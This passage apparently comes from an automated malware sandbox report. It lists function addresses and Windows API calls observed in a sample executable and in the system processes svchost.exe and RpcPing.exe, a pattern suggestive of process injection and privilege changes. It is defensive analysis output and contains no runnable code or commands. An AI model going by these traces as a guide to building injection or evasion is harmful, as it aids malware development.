            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02CA2CA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2C60 NtCreateKey,LdrInitializeThunk,5_2_02CA2C60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02CA2C70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02CA2DD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02CA2DF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02CA2D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02CA2D30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA35C0 NtCreateMutant,LdrInitializeThunk,5_2_02CA35C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA39B0 NtGetContextThread,LdrInitializeThunk,5_2_02CA39B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2AB0 NtWaitForSingleObject,5_2_02CA2AB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2B80 NtQueryInformationFile,5_2_02CA2B80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2EA0 NtAdjustPrivilegesToken,5_2_02CA2EA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2E30 NtWriteVirtualMemory,5_2_02CA2E30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2F90 NtProtectVirtualMemory,5_2_02CA2F90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2FA0 NtQuerySection,5_2_02CA2FA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2F60 NtCreateProcessEx,5_2_02CA2F60
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2CC0 NtQueryVirtualMemory,5_2_02CA2CC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2CF0 NtOpenProcess,5_2_02CA2CF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2C00 NtQueryInformationProcess,5_2_02CA2C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2DB0 NtEnumerateKey,5_2_02CA2DB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA2D00 NtSetInformationFile,5_2_02CA2D00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3090 NtSetValueKey,5_2_02CA3090
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3010 NtOpenDirectoryObject,5_2_02CA3010
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3D70 NtOpenThread,5_2_02CA3D70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA3D10 NtOpenProcessToken,5_2_02CA3D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00498FD0 NtCreateFile,5_2_00498FD0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00499140 NtReadFile,5_2_00499140
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00499230 NtDeleteFile,5_2_00499230
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004992D0 NtClose,5_2_004992D0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00499430 NtAllocateVirtualMemory,5_2_00499430
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_040DF6200_2_040DF620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004184432_2_00418443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011C02_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EB132_2_0042EB13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023A02_2_004023A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC7A2_2_0040FC7A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC832_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004166232_2_00416623
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FEA32_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026AA2_2_004026AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026B02_2_004026B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F702_2_00402F70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF232_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA3522_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F02_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035003E62_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E02742_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C02C02_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C81582_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034301002_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA1182_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D09D493_2_04D09D49
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D1249E3_2_04D1249E
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D09D9E3_2_04D09D9E
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D09DAD3_2_04D09DAD
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D0BD1E3_2_04D0BD1E
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D2A98E3_2_04D2A98E
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D0BAF53_2_04D0BAF5
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D0BAFE3_2_04D0BAFE
            Source: C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exeCode function: 3_2_04D142BE3_2_04D142BE
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CF02C05_2_02CF02C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D102745_2_02D10274
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D303E65_2_02D303E6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C7E3F05_2_02C7E3F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2A3525_2_02D2A352
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D020005_2_02D02000
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D281CC5_2_02D281CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D241A25_2_02D241A2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D301AA5_2_02D301AA
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CF81585_2_02CF8158
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C601005_2_02C60100
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D0A1185_2_02D0A118
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C8C6E05_2_02C8C6E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C6C7C05_2_02C6C7C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C947505_2_02C94750
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C707705_2_02C70770
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D1E4F65_2_02D1E4F6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D224465_2_02D22446
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D144205_2_02D14420
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D305915_2_02D30591
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C705355_2_02C70535
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C6EA805_2_02C6EA80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D26BD75_2_02D26BD7
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2AB405_2_02D2AB40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C9E8F05_2_02C9E8F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C568B85_2_02C568B8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C728405_2_02C72840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C7A8405_2_02C7A840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C729A05_2_02C729A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D3A9A65_2_02D3A9A6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C869625_2_02C86962
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2EEDB5_2_02D2EEDB
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2CE935_2_02D2CE93
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C82E905_2_02C82E90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C70E595_2_02C70E59
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2EE265_2_02D2EE26
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C62FC85_2_02C62FC8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C7CFE05_2_02C7CFE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CEEFA05_2_02CEEFA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CE4F405_2_02CE4F40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D12F305_2_02D12F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CB2F285_2_02CB2F28
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C90F305_2_02C90F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C60CF25_2_02C60CF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D10CB55_2_02D10CB5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C70C005_2_02C70C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C6ADE05_2_02C6ADE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C88DBF5_2_02C88DBF
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C7AD005_2_02C7AD00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D0CD1F5_2_02D0CD1F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C8B2C05_2_02C8B2C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D112ED5_2_02D112ED
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C752A05_2_02C752A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CB739A5_2_02CB739A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C5D34C5_2_02C5D34C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2132D5_2_02D2132D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C770C05_2_02C770C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D1F0CC5_2_02D1F0CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2F0E05_2_02D2F0E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D270E95_2_02D270E9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C7B1B05_2_02C7B1B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CA516C5_2_02CA516C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C5F1725_2_02C5F172
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D3B16B5_2_02D3B16B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D216CC5_2_02D216CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CB56305_2_02CB5630
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2F7B05_2_02D2F7B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C614605_2_02C61460
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2F43F5_2_02D2F43F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D395C35_2_02D395C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D0D5B05_2_02D0D5B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D275715_2_02D27571
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D1DAC65_2_02D1DAC6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CB5AA05_2_02CB5AA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D11AA35_2_02D11AA3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D0DAAC5_2_02D0DAAC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D27A465_2_02D27A46
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2FA495_2_02D2FA49
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CE3A6C5_2_02CE3A6C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CADBF95_2_02CADBF9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CE5BF05_2_02CE5BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C8FB805_2_02C8FB80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2FB765_2_02D2FB76
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C738E05_2_02C738E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CDD8005_2_02CDD800
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C799505_2_02C79950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C8B9505_2_02C8B950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D059105_2_02D05910
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C79EB05_2_02C79EB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C33FD25_2_02C33FD2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C33FD55_2_02C33FD5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C71F925_2_02C71F92
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2FFB15_2_02D2FFB1
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2FF095_2_02D2FF09
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D2FCF25_2_02D2FCF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02CE9C325_2_02CE9C32
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C8FDC05_2_02C8FDC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02C73D405_2_02C73D40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D21D5A5_2_02D21D5A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02D27D735_2_02D27D73
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00481B905_2_00481B90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0047CA675_2_0047CA67
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0047CA705_2_0047CA70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0047CC905_2_0047CC90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0047AD105_2_0047AD10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004852305_2_00485230
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004834105_2_00483410
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0049B9005_2_0049B900
